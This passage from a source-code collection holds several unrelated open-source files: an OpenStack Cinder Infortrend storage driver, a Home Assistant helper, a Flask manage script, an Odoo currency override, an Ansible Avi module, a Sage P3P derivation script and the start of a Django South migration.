provisioning_space += int(entry['Size'])
return provisioning_space
def create_snapshot(self, snapshot):
"""Creates a snapshot."""
snapshot_id = snapshot['id'].replace('-', '')
volume_id = snapshot['volume_id'].replace('-', '')
LOG.debug('Create Snapshot %(snapshot)s volume %(volume)s.',
{'snapshot': snapshot_id, 'volume': volume_id})
model_update = {}
part_id = self._get_part_id(volume_id)
if part_id is None:
msg = _('Failed to get Partition ID for volume %(volume_id)s.') % {
'volume_id': volume_id}
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
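        # Serialize snapshot creation per partition: the new snapshot is
        # identified by taking the last entry of ShowSnapshot, which is only
        # safe when no concurrent create runs against the same partition.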
@lockutils.synchronized(
'snapshot-' + part_id, 'infortrend-', True)
def do_create_snapshot():
self._execute('CreateSnapshot', 'part', part_id)
rc, tmp_snapshot_list = self._execute(
'ShowSnapshot', 'part=%s' % part_id)
return tmp_snapshot_list
snapshot_list = do_create_snapshot()
LOG.info(_LI(
'Create success. '
'Snapshot: %(snapshot)s, '
'Snapshot ID in raid: %(raid_snapshot_id)s, '
'volume: %(volume)s.'), {
'snapshot': snapshot_id,
'raid_snapshot_id': snapshot_list[-1]['SI-ID'],
'volume': volume_id})
model_update['provider_location'] = snapshot_list[-1]['SI-ID']
return model_update
def delete_snapshot(self, snapshot):
"""Delete the snapshot."""
snapshot_id = snapshot['id'].replace('-', '')
volume_id = snapshot['volume_id'].replace('-', '')
LOG.debug('Delete Snapshot %(snapshot)s volume %(volume)s.',
{'snapshot': snapshot_id, 'volume': volume_id})
raid_snapshot_id = self._get_raid_snapshot_id(snapshot)
if raid_snapshot_id:
rc, replica_list = self._execute('ShowReplica', '-l')
has_pair = self._delete_pair_with_snapshot(
raid_snapshot_id, replica_list)
if not has_pair:
self._execute('DeleteSnapshot', raid_snapshot_id, '-y')
LOG.info(_LI('Delete Snapshot %(snapshot_id)s completed.'), {
'snapshot_id': snapshot_id})
else:
msg = _('Failed to delete snapshot '
'for snapshot_id: %s '
'because it has pair.') % snapshot_id
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
else:
msg = _(
'Failed to get Raid Snapshot ID '
'from Snapshot %(snapshot_id)s.') % {
'snapshot_id': snapshot_id}
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
def _get_raid_snapshot_id(self, snapshot):
if 'provider_location' not in snapshot:
LOG.warning(_LW(
                'Failed to get RAID snapshot ID; '
                'it was not stored in the snapshot.'))
return
return snapshot['provider_location']
def _delete_pair_with_snapshot(self, snapshot_id, replica_list):
has_pair = False
for entry in replica_list:
if entry['Source'] == snapshot_id:
if not self._check_replica_completed(entry):
has_pair = True
LOG.warning(_LW(
                        'Snapshot is still %(status)s. Cannot delete snapshot.'), {
'status': entry['Status']})
else:
self._execute('DeleteReplica', entry['Pair-ID'], '-y')
return has_pair
def _get_part_id(self, volume_id, pool_id=None, part_list=None):
if part_list is None:
rc, part_list = self._execute('ShowPartition')
for entry in part_list:
if pool_id is None:
if entry['Name'] == volume_id:
return entry['ID']
else:
if entry['Name'] == volume_id and entry['LV-ID'] == pool_id:
return entry['ID']
return
def create_volume_from_snapshot(self, volume, snapshot):
raid_snapshot_id = self._get_raid_snapshot_id(snapshot)
if raid_snapshot_id is None:
msg = _('Failed to get Raid Snapshot ID '
'from snapshot: %(snapshot_id)s.') % {
'snapshot_id': snapshot['id']}
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
src_part_id = self._check_snapshot_filled_block(raid_snapshot_id)
model_update = self._create_volume_from_snapshot_id(
volume, raid_snapshot_id, src_part_id)
LOG.info(_LI(
'Create Volume %(volume_id)s from '
'snapshot %(snapshot_id)s completed.'), {
'volume_id': volume['id'],
'snapshot_id': snapshot['id']})
return model_update
def _check_snapshot_filled_block(self, raid_snapshot_id):
rc, snapshot_list = self._execute(
'ShowSnapshot', 'si=%s' % raid_snapshot_id, '-l')
if snapshot_list and snapshot_list[0]['Total-filled-block'] == '0':
return snapshot_list[0]['Partition-ID']
return
def _create_volume_from_snapshot_id(
self, dst_volume, raid_snapshot_id, src_part_id):
# create the target volume for volume copy
dst_volume_id = dst_volume['id'].replace('-', '')
self._create_partition_by_default(dst_volume)
dst_part_id = self._get_part_id(dst_volume_id)
# prepare return value
system_id = self._get_system_id(self.ip)
model_dict = {
'system_id': system_id,
'partition_id': dst_part_id,
}
model_info = self._concat_provider_location(model_dict)
model_update = {"provider_location": model_info}
if src_part_id:
# clone the volume from the origin partition
commands = (
'Cinder-Snapshot', 'part', src_part_id, 'part', dst_part_id
)
self._execute('CreateReplica', *commands)
self._wait_replica_complete(dst_part_id)
# clone the volume from the snapshot
commands = (
'Cinder-Snapshot', 'si', raid_snapshot_id, 'part', dst_part_id
)
self._execute('CreateReplica', *commands)
self._wait_replica_complete(dst_part_id)
return model_update
@lockutils.synchronized('connection', 'infortrend-', True)
def initialize_connection(self, volume, connector):
if self.protocol == 'iSCSI':
multipath = connector.get('multipath', False)
return self._initialize_connection_iscsi(
volume, connector, multipath)
elif self.protocol == 'FC':
return self._initialize_connection_fc(
volume, connector)
else:
msg = _('Unknown protocol: %(protocol)s.') % {
'protocol': self.protocol}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
def _initialize_connection_fc(self, volume, connector):
self._init_map_info(True)
self._update_map_info(True)
map_lun, target_wwpns, initiator_target_map = (
self._do_fc_connection(volume, connector)
)
properties = self._generate_fc_connection_properties(
map_lun, target_wwpns, initiator_target_map)
LOG.info(_LI('Successfully initialized connection. '
'target_wwn: %(target_wwn)s, '
'initiator_target_map: %(initiator_target_map)s, '
'lun: %(target_lun)s.'), properties['data'])
return properties
def _do_fc_connection(self, volume, connector):
volume_id = volume['id'].replace('-', '')
target_wwpns = []
partition_data = self._extract_all_provider_location(
volume['provider_location'])
part_id = partition_data['partition_id']
if part_id is None:
part_id = self._get_part_id(volume_id)
wwpn_list, wwpn_channel_info = self._get_wwpn_list()
initiator_target_map, target_wwpns = self._build_initiator_target_map(
connector, wwpn_list)
map_lun = self._get_common_lun_map_id(wwpn_channel_info)
# Sort items to get a reliable behaviour. Dictionary items
# are iterated in a random order because of hash randomization.
for initiator_wwpn in sorted(initiator_target_map):
for target_wwpn in initiator_target_map[initiator_wwpn]:
channel_id = wwpn_channel_info[target_wwpn.upper()]['channel']
controller = wwpn_channel_info[target_wwpn.upper()]['slot']
self._create_map_with_lun_filter(
part_id, channel_id, map_lun, initiator_wwpn,
controller=controller)
return map_lun, target_wwpns, initiator_target_map
def _build_initiator_target_map(self, connector, all_target_wwpns):
initiator_target_map = {}
target_wwpns = []
if self.fc_lookup_service:
lookup_map = (
self.fc_lookup_service.get_device_mapping_from_network(
connector['wwpns'], all_target_wwpns)
)
for fabric_name in lookup_map:
fabric = lookup_map[fabric_name]
target_wwpns.extend(fabric['target_port_wwn_list'])
for initiator in fabric['initiator_port_wwn_list']:
initiator_target_map[initiator] = (
fabric['target_port_wwn_list']
)
else:
initiator_wwns = connector['wwpns']
target_wwpns = all_target_wwpns
for initiator in initiator_wwns:
initiator_target_map[initiator] = all_target_wwpns
return initiator_target_map, target_wwpns
def _generate_fc_connection_properties(
self, lun_id, target_wwpns, initiator_target_map):
return {
'driver_volume_type': 'fibre_channel',
'data': {
'target_discovered': True,
'target_lun': int(lun_id),
'target_wwn': target_wwpns,
'initiator_target_map': initiator_target_map,
},
}
@log_func
def _initialize_connection_iscsi(self, volume, connector, multipath):
self._init_map_info(multipath)
self._update_map_info(multipath)
volume_id = volume['id'].replace('-', '')
partition_data = self._extract_all_provider_location(
volume['provider_location']) # system_id, part_id
part_id = partition_data['partition_id']
if part_id is None:
part_id = self._get_part_id(volume_id)
self._set_host_iqn(connector['initiator'])
map_chl, map_lun, mcs_id = self._get_mapping_info(multipath)
lun_id = map_lun[0]
if self.iscsi_multipath or multipath:
channel_id = self._create_map_with_mcs(
part_id, map_chl['slot_a'], lun_id, connector['initiator'])
else:
channel_id = map_chl['slot_a'][0]
self._create_map_with_lun_filter(
part_id, channel_id, lun_id, connector['initiator'])
rc, net_list = self._execute('ShowNet')
ip = self._get_ip_by_channel(channel_id, net_list)
if ip is None:
msg = _(
'Failed to get ip on Channel %(channel_id)s '
'with volume: %(volume_id)s.') % {
'channel_id': channel_id, 'volume_id': volume_id}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
partition_data = self._combine_channel_lun_target_id(
partition_data, mcs_id, lun_id, channel_id)
property_value = [{
'lun_id': partition_data['lun_id'],
'iqn': self._generate_iqn(partition_data),
'ip': ip,
'port': self.constants['ISCSI_PORT'],
}]
properties = self._generate_iscsi_connection_properties(
property_value, volume)
LOG.info(_LI('Successfully initialized connection '
'with volume: %(volume_id)s.'), properties['data'])
return properties
@log_func
def _combine_channel_lun_target_id(
self, partition_data, mcs_id, lun_id, channel_id):
target_id = self.target_dict['slot_a'][channel_id]
partition_data['mcs_id'] = mcs_id
partition_data['lun_id'] = lun_id
partition_data['target_id'] = target_id
partition_data['slot_id'] = 1
return partition_data
def _set_host_iqn(self, host_iqn):
rc, iqn_list = self._execute('ShowIQN')
check_iqn_exist = False
for entry in iqn_list:
if entry['IQN'] == host_iqn:
check_iqn_exist = True
if not check_iqn_exist:
self._execute(
'CreateIQN', host_iqn, self._truncate_host_name(host_iqn))
def _truncate_host_name(self, iqn):
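        # Keep only the trailing 16 characters: the tail of an IQN is its
        # most distinctive part, and the CLI host-alias field appears to be
        # limited to 16 characters.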
if len(iqn) > 16:
return iqn[-16:]
else:
return iqn
@log_func
def _generate_iqn(self, partition_data):
return self.iqn % (
partition_data['system_id'],
partition_data['mcs_id'],
partition_data['target_id'],
partition_data['slot_id'])
@log_func
def _get_ip_by_channel(
self, channel_id, net_list, controller='slot_a'):
slot_name = 'slotA' if controller == 'slot_a' else 'slotB'
for entry in net_list:
if entry['ID'] == channel_id and entry['Slot'] == slot_name:
return entry['IPv4']
return
def _get_wwpn_list(self):
rc, wwn_list = self._execute('ShowWWN')
wwpn_list = []
wwpn_channel_info = {}
for entry in wwn_list:
channel_id = entry['CH']
if 'BID' in entry['ID']:
slot_name = 'slot_b'
else:
slot_name = 'slot_a'
if channel_id in self.map_dict[slot_name]:
wwpn_list.append(entry['WWPN'])
wwpn_channel_info[entry['WWPN']] = {
'channel': channel_id,
'slot': slot_name,
}
return wwpn_list, wwpn_channel_info
@log_func
def _generate_iscsi_connection_properties(
self, property_value, volume):
properties = {}
discovery_exist = False
specific_property = property_value[0]
discovery_ip = '%s:%s' % (
specific_property['ip'], specific_property['port'])
discovery_iqn = specific_property['iqn']
if self._do_iscsi_discovery(discovery_iqn, discovery_ip):
properties['target_portal'] = discovery_ip
properties['target_iqn'] = discovery_iqn
properties['target_lun'] = int(specific_property['lun_id'])
discovery_exist = True
if not discovery_exist:
msg = _(
'Could not find iSCSI target '
'for volume: %(volume_id)s.') % {
'volume_id': volume['id']}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
properties['target_discovered'] = discovery_exist
properties['volume_id'] = volume['id']
if 'provider_auth' in volume:
auth = volume['provider_auth']
if auth:
(auth_method, auth_username, auth_secret) = auth.split()
properties['auth_method'] = auth_method
properties['auth_username'] = auth_username
properties['auth_password'] = auth_secret
return {
'driver_volume_type': 'iscsi',
'data': properties,
}
@log_func
def _do_iscsi_discovery(self, target_iqn, target_ip):
rc, out = self._execute(
'ExecuteCommand',
'iscsiadm', '-m', 'discovery',
'-t', 'sendtargets', '-p',
target_ip,
run_as_root=True)
if rc != 0:
LOG.error(_LE(
                'Cannot discover targets at %(target_ip)s for %(target_iqn)s.'), {
'target_ip': target_ip, 'target_iqn': target_iqn})
return False
else:
for target in out.splitlines():
if target_iqn in target and target_ip in target:
return True
return False
def extend_volume(self, volume, new_size):
volume_id = volume['id'].replace('-', '')
part_id = self._extract_specific_provider_location(
volume['provider_location'], 'partition_id')
if part_id is None:
part_id = self._get_part_id(volume_id)
expand_size = new_size - volume['size']
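        # The CLI only takes integer sizes, so fractional GiB growth is
        # converted to whole MiB before issuing the expand command.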
if '.' in ('%s' % expand_size):
expand_size = round(gi_to_mi(float(expand_size)))
expand_command = 'size=%sMB' % expand_size
else:
expand_command = 'size=%sGB' % expand_size
self._execute('SetPartition', 'expand', part_id, expand_command)
LOG.info(_LI(
'Successfully extended volume %(volume_id)s to size %(size)s.'), {
'volume_id': volume['id'], 'size': new_size})
@lockutils.synchronized('connection', 'infortrend-', True)
def terminate_connection(self, volume, connector):
volume_id = volume['id'].replace('-', '')
multipath = connector.get('multipath', False)
conn_info = None
part_id = self._extract_specific_provider_location(
volume['provider_location'], 'partition_id')
if part_id is None:
part_id = self._get_part_id(volume_id)
self._execute('DeleteMap', 'part', part_id, '-y')
map_info = self._update_map_info(multipath)
if self.protocol == 'iSCSI':
initiator_iqn = self._truncate_host_name(connector['initiator'])
lun_map_exist = self._check_initiator_has_lun_map(
initiator_iqn, map_info)
if not lun_map_exist:
self._execute('DeleteIQN', initiator_iqn)
elif self.protocol == 'FC':
conn_info = {'driver_volume_type': 'fibre_channel',
'data': {}}
lun_map_exist = self._check_initiator_has_lun_map(
connector['wwpns'], map_info)
if not lun_map_exist:
wwpn_list, wwpn_channel_info = self._get_wwpn_list()
init_target_map, target_wwpns = (
self._build_initiator_target_map(connector, wwpn_list)
)
conn_info['data']['initiator_target_map'] = init_target_map
LOG.info(_LI(
'Successfully terminated connection for volume: %(volume_id)s.'), {
'volume_id': volume['id']})
return conn_info
def migrate_volume(self, volume, host, new_extraspecs=None):
is_valid, dst_pool_id = (
self._is_valid_for_storage_assisted_migration(host)
)
if not is_valid:
return (False, None)
model_dict = self._migrate_volume_with_pool(
volume, dst_pool_id, new_extraspecs)
model_update = {
"provider_location": self._concat_provider_location(model_dict),
}
LOG.info(_LI('Migrate Volume %(volume_id)s completed.'), {
'volume_id': volume['id']})
return (True, model_update)
def _is_valid_for_storage_assisted_migration(self, host):
if 'pool_id' not in host['capabilities']:
LOG.warning(_LW('Failed to get target pool id.'))
return (False, None)
dst_pool_id = host['capabilities']['pool_id']
if dst_pool_id is None:
return (False, None)
return (True, dst_pool_id)
def _migrate_volume_with_pool(self, volume, dst_pool_id, extraspecs=None):
volume_id = volume['id'].replace('-', '')
# Get old partition data for delete map
partition_data = self._extract_all_provider_location(
volume['provider_location'])
src_part_id = partition_data['partition_id']
if src_part_id is None:
src_part_id = self._get_part_id(volume_id)
# Create New Partition
self._create_partition_with_pool(volume, dst_pool_id, extraspecs)
dst_part_id = self._get_part_id(
volume_id, pool_id=dst_pool_id)
if dst_part_id is None:
msg = _('Failed to get new part id in new pool: %(pool_id)s.') % {
'pool_id': dst_pool_id}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
# Volume Mirror from old partition into new partition
commands = (
'Cinder-Migrate', 'part', src_part_id, 'part', dst_part_id,
'type=mirror'
)
self._execute('CreateReplica', *commands)
self._wait_replica_complete(dst_part_id)
self._execute('DeleteMap', 'part', src_part_id, '-y')
self._execute('DeletePartition', src_part_id, '-y')
model_dict = {
'system_id': partition_data['system_id'],
'partition_id': dst_part_id,
}
return model_dict
def _wait_replica_complete(self, part_id):
start_time = int(time.time())
timeout = self._replica_timeout
def _inner():
check_done = False
try:
rc, replica_list = self._execute('ShowReplica', '-l')
for entry in replica_list:
if (entry['Target'] == part_id and
self._check_replica_completed(entry)):
check_done = True
self._execute('DeleteReplica', entry['Pair-ID'], '-y')
except Exception:
check_done = False
LOG.exception(_LE('Cannot detect replica status.'))
if check_done:
raise loopingcall.LoopingCallDone()
if int(time.time()) - start_time > timeout:
                msg = _('Timed out waiting for replica to complete.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
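        # Poll _inner every 10 seconds until the replica reports completed
        # (which raises LoopingCallDone) or the timeout above expires.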
timer = loopingcall.FixedIntervalLoopingCall(_inner)
timer.start(interval=10).wait()
def _check_extraspec_value(self, extraspec, validvalues):
if not extraspec:
LOG.debug("The given extraspec is None.")
elif extraspec not in validvalues:
msg = _("The extraspec: %(extraspec)s is not valid.") % {
'extraspec': extraspec}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
def _get_enable_specs_on_array(self):
enable_specs = {}
rc, license_list = self._execute('ShowLicense')
for key, value in license_list.items():
if value['Support']:
enable_specs[key] = value
return enable_specs
def manage_existing_get_size(self, volume, ref):
"""Return size of volume to be managed by manage_existing."""
volume_name = self._get_existing_volume_ref_name(ref)
part_entry = self._get_latter_volume_dict(volume_name)
if part_entry is None:
msg = _('Specified logical volume does not exist.')
LOG.error(msg)
raise exception.ManageExistingInvalidReference(
existing_ref=ref, reason=msg)
rc, map_info = self._execute('ShowMap', 'part=%s' % part_entry['ID'])
if len(map_info) != 0:
msg = _('The specified volume is mapped to a host.')
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
return int(math.ceil(mi_to_gi(float(part_entry['Size']))))
def manage_existing(self, volume, ref):
volume_name = self._get_existing_volume_ref_name(ref)
volume_id = volume['id'].replace('-', '')
part_entry = self._get_latter_volume_dict(volume_name)
if part_entry is None:
msg = _('Specified logical volume does not exist.')
LOG.error(msg)
raise exception.ManageExistingInvalidReference(
existing_ref=ref, reason=msg)
self._execute('SetPartition', part_entry['ID'], 'name=%s' % volume_id)
model_dict = {
'system_id': self._get_system_id(self.ip),
'partition_id': part_entry['ID'],
}
model_update = {
"provider_location": self._concat_provider_location(model_dict),
}
LOG.info(_LI('Rename Volume %(volume_id)s completed.'), {
'volume_id': volume['id']})
return model_update
def _get_existing_volume_ref_name(self, ref):
volume_name = None
if 'source-name' in ref:
volume_name = ref['source-name']
elif 'source-id' in ref:
volume_name = self._get_unmanaged_volume_name(
ref['source-id'].replace('-', ''))
else:
msg = _('Reference must contain source-id or source-name.')
LOG.error(msg)
raise exception.ManageExistingInvalidReference(
existing_ref=ref, reason=msg)
return volume_name
def unmanage(self, volume):
volume_id = volume['id'].replace('-', '')
part_id = self._extract_specific_provider_location(
volume['provider_location'], 'partition_id')
if part_id is None:
part_id = self._get_part_id(volume_id)
new_vol_name = self._get_unmanaged_volume_name(volume_id)
self._execute('SetPartition', part_id, 'name=%s' % new_vol_name)
LOG.info(_LI('Unmanage volume %(volume_id)s completed.'), {
'volume_id': volume_id})
def _get_unmanaged_volume_name(self, volume_id):
return self.unmanaged_prefix % volume_id[:-17]
def _get_specific_volume_dict(self, volume_id):
ref_dict = {}
rc, part_list = self._execute('ShowPartition')
for entry in part_list:
if entry['Name'] == volume_id:
ref_dict = entry
break
return ref_dict
def _get_latter_volume_dict(self, volume_name):
rc, part_list = self._execute('ShowPartition', '-l')
latest_timestamps = 0
ref_dict = None
for entry in part_list:
if entry['Name'] == volume_name:
timestamps = self._get_part_timestamps(
entry['Creation-time'])
if timestamps > latest_timestamps:
ref_dict = entry
latest_timestamps = timestamps
return ref_dict
def _get_part_timestamps(self, time_string):
"""Transform 'Sat, Jan 11 22:18:40 2020' into timestamps with sec."""
first, value = time_string.split(',')
timestamps = time.mktime(
time.strptime(value, " %b %d %H:%M:%S %Y"))
return timestamps
def _check_volume_attachment(self, volume):
if not volume['volume_attachment']:
return False
return True
def _check_volume_has_snapshot(self, volume):
part_id = self._extract_specific_provider_location(
volume['provider_location'], 'partition_id')
rc, snapshot_list = self._execute('ShowSnapshot', 'part=%s' % part_id)
if len(snapshot_list) > 0:
return True
return False
def retype(self, ctxt, volume, new_type, diff, host):
"""Convert the volume to be of the new type."""
if volume['host'] != host['host']:
if self._check_volume_attachment(volume):
LOG.warning(_LW(
'Volume %(volume_id)s cannot be retyped '
'during attachment.'), {
'volume_id': volume['id']})
return False
if self._check_volume_has_snapshot(volume):
LOG.warning(_LW(
'Volume %(volume_id)s cannot be retyped '
'because it has snapshot.'), {
'volume_id': volume['id']})
return False
new_extraspecs = new_type['extra_specs']
rc, model_update = self.migrate_volume(
volume, host, new_extraspecs)
if rc:
LOG.info(_LI(
'Retype Volume %(volume_id)s is done '
'and migrated to pool %(pool_id)s.'), {
'volume_id': volume['id'],
'pool_id': host['capabilities']['pool_id']})
return (rc, model_update)
else:
if ('infortrend_provisioning' in diff['extra_specs'] and
(diff['extra_specs']['infortrend_provisioning'][0] !=
diff['extra_specs']['infortrend_provisioning'][1])):
LOG.warning(_LW(
'The provisioning: %(provisioning)s '
'is not valid.'), {
'provisioning':
diff['extra_specs']['infortrend_provisioning'][1]})
return False
LOG.info(_LI('Retype Volume %(volume_id)s is completed.'), {
'volume_id': volume['id']})
return True
def update_migrated_volume(self, ctxt, volume, new_volume,
original_volume_status):
"""Return model update for migrated volume."""
src_volume_id = volume['id'].replace('-', '')
dst_volume_id = new_volume['id'].replace('-', '')
part_id = self._extract_specific_provider_location(
new_volume['provider_location'], 'partition_id')
if part_id is None:
part_id = self._get_part_id(dst_volume_id)
LOG.debug(
'Rename partition %(part_id)s '
'into new volume %(new_volume)s.', {
'part_id': part_id, 'new_volume': dst_volume_id})
try:
self._execute('SetPartition', part_id, 'name=%s' % src_volume_id)
except exception.InfortrendCliException:
LOG.exception(_LE('Failed to rename %(new_volume)s into '
'%(volume)s.'), {'new_volume': new_volume['id'],
'volume': volume['id']})
return {'_name_id': new_volume['_name_id'] or new_volume['id']}
LOG.info(_LI('Update migrated volume %(new_volume)s completed.'), {
'new_volume': new_volume['id']})
model_update = {
'_name_id': None,
'provider_location': new_volume['provider_location'],
}
return model_update
|
w1ll1am23/home-assistant
|
refs/heads/dev
|
homeassistant/components/water_heater/group.py
|
12
|
"""Describe group states."""
from homeassistant.components.group import GroupIntegrationRegistry
from homeassistant.const import STATE_OFF
from homeassistant.core import callback
from homeassistant.helpers.typing import HomeAssistantType
from . import (
STATE_ECO,
STATE_ELECTRIC,
STATE_GAS,
STATE_HEAT_PUMP,
STATE_HIGH_DEMAND,
STATE_PERFORMANCE,
)
@callback
def async_describe_on_off_states(
hass: HomeAssistantType, registry: GroupIntegrationRegistry
) -> None:
"""Describe group on off states."""
registry.on_off_states(
{
STATE_ECO,
STATE_ELECTRIC,
STATE_PERFORMANCE,
STATE_HIGH_DEMAND,
STATE_HEAT_PUMP,
STATE_GAS,
},
STATE_OFF,
)
|
NYCPython/irclogs
|
refs/heads/master
|
manage.py
|
1
|
from flask_migrate import Migrate, MigrateCommand
from flask_script import Manager
from irclogs.core import create_app, db
from irclogs.views import frontend
app = create_app()
manager = Manager(app)
migrate = Migrate(app, db)
manager.add_command('db', MigrateCommand)
if __name__ == '__main__':
manager.run()
|
bobisme/odoo
|
refs/heads/sp-8.0
|
addons/account/res_currency.py
|
340
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2010 OpenERP s.a. (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv
"""Inherit res.currency to handle accounting date values when converting currencies"""
class res_currency_account(osv.osv):
_inherit = "res.currency"
def _get_conversion_rate(self, cr, uid, from_currency, to_currency, context=None):
if context is None:
context = {}
rate = super(res_currency_account, self)._get_conversion_rate(cr, uid, from_currency, to_currency, context=context)
        # Handle accounts whose outgoing currency rate method is 'average' rather than 'at date'.
account = context.get('res.currency.compute.account')
account_invert = context.get('res.currency.compute.account_invert')
if account and account.currency_mode == 'average' and account.currency_id:
query = self.pool.get('account.move.line')._query_get(cr, uid, context=context)
cr.execute('select sum(debit-credit),sum(amount_currency) from account_move_line l ' \
'where l.currency_id=%s and l.account_id=%s and '+query, (account.currency_id.id,account.id,))
            tot1, tot2 = cr.fetchone()
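            # tot1 is the balance in company currency, tot2 the balance in
            # the account's currency; their ratio is the average historical
            # rate (inverted when account_invert is set).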
if tot2 and not account_invert:
rate = float(tot1)/float(tot2)
elif tot1 and account_invert:
rate = float(tot2)/float(tot1)
return rate
|
tchernomax/ansible
|
refs/heads/devel
|
lib/ansible/modules/network/avi/avi_pkiprofile.py
|
20
|
#!/usr/bin/python
#
# @author: Gaurav Rastogi (grastogi@avinetworks.com)
# Eric Anderson (eanderson@avinetworks.com)
# module_check: supported
# Avi Version: 17.1.1
#
# Copyright: (c) 2017 Gaurav Rastogi, <grastogi@avinetworks.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_pkiprofile
author: Gaurav Rastogi (grastogi@avinetworks.com)
short_description: Module for setup of PKIProfile Avi RESTful Object
description:
    - This module is used to configure the PKIProfile object.
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.3"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent", "present"]
avi_api_update_method:
description:
- Default method for object update is HTTP PUT.
- Setting to patch will override that behavior to use HTTP PATCH.
version_added: "2.5"
default: put
choices: ["put", "patch"]
avi_api_patch_op:
description:
- Patch operation to use when using avi_api_update_method as patch.
version_added: "2.5"
choices: ["add", "replace", "delete"]
ca_certs:
description:
        - Trusted certificate authorities (root and intermediate) used for certificate validation.
created_by:
description:
- Creator name.
crl_check:
description:
- When enabled, avi will verify via crl checks that certificates in the trust chain have not been revoked.
- Default value when not specified in API or module is interpreted by Avi Controller as True.
type: bool
crls:
description:
- Certificate revocation lists.
ignore_peer_chain:
description:
- When enabled, avi will not trust intermediate and root certs presented by a client.
- Instead, only the chain certs configured in the certificate authority section will be used to verify trust of the client's cert.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
is_federated:
description:
- This field describes the object's replication scope.
- If the field is set to false, then the object is visible within the controller-cluster and its associated service-engines.
- If the field is set to true, then the object is replicated across the federation.
- Field introduced in 17.1.3.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
version_added: "2.4"
type: bool
name:
description:
- Name of the pki profile.
required: true
tenant_ref:
description:
- It is a reference to an object of type tenant.
url:
description:
- Avi controller URL of the object.
uuid:
description:
- Unique object identifier of the object.
validate_only_leaf_crl:
description:
- When enabled, avi will only validate the revocation status of the leaf certificate using crl.
- To enable validation for the entire chain, disable this option and provide all the relevant crls.
- Default value when not specified in API or module is interpreted by Avi Controller as True.
type: bool
extends_documentation_fragment:
- avi
'''
EXAMPLES = """
- name: Example to create PKIProfile object
avi_pkiprofile:
controller: 10.10.25.42
username: admin
password: something
state: present
name: sample_pkiprofile
"""
RETURN = '''
obj:
description: PKIProfile (api/pkiprofile) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.network.avi.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
avi_api_update_method=dict(default='put',
choices=['put', 'patch']),
avi_api_patch_op=dict(choices=['add', 'replace', 'delete']),
ca_certs=dict(type='list',),
created_by=dict(type='str',),
crl_check=dict(type='bool',),
crls=dict(type='list',),
ignore_peer_chain=dict(type='bool',),
is_federated=dict(type='bool',),
name=dict(type='str', required=True),
tenant_ref=dict(type='str',),
url=dict(type='str',),
uuid=dict(type='str',),
validate_only_leaf_crl=dict(type='bool',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
return avi_ansible_api(module, 'pkiprofile',
set([]))
if __name__ == '__main__':
main()
|
fengbaicanhe/intellij-community
|
refs/heads/master
|
python/testData/refactoring/unwrap/elseInIfUnwrap_after.py
|
83
|
z = 3
|
intrack/BoofCV-master
|
refs/heads/master
|
main/geo/generate/python/P3PFinsterwalder.py
|
2
|
# One typo was found in this section of the paper. Validating other equations in an attempt to hunt down problems.
from sage.all import *
from utilsymbolic import *
(A,B,C,D,E,F)=var('A,B,C,D,E,F')
(l,cos23,cos12,cos13)=var('l,cos23,cos12,cos13')
(a,b,c)=var('a,b,c')
# Validating equation (14)
eq = C*(A*F - D**2) + B*(2*D*E - B*F) - A*E**2
eq = eq.substitute(A = 1 + l)
eq = eq.substitute(B = -cos23)
eq = eq.substitute(C = 1 - a**2/b**2 - l*c**2/b**2)
eq = eq.substitute(D = -l*cos12)
eq = eq.substitute(E = (a**2/b**2 + l*c**2/b**2)*cos13)
eq = eq.substitute(F = -a**2/b**2 + l*(1-c**2/b**2))
eq *= b**4
print 'double J = '+extractNotVarEq(eq,'l')+';'
print 'double I = '+extractVarEq(eq,'l')+';'
print 'double H = '+extractVarEq(eq,'l^2')+';'
print 'double G = '+extractVarEq(eq,'l^3')+';'
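# The printed lines are Java assignments for the coefficients of equation (14)
# viewed as a cubic in l: J collects the terms without l, and I, H, G the
# coefficients of l, l^2 and l^3, ready to paste into the Java implementation.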
|
DefyVentures/edx-platform
|
refs/heads/master
|
lms/djangoapps/shoppingcart/migrations/0002_auto__add_field_paidcourseregistration_mode.py
|
182
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'PaidCourseRegistration.mode'
db.add_column('shoppingcart_paidcourseregistration', 'mode',
self.gf('django.db.models.fields.SlugField')(default='honor', max_length=50),
keep_default=False)
def backwards(self, orm):
# Deleting field 'PaidCourseRegistration.mode'
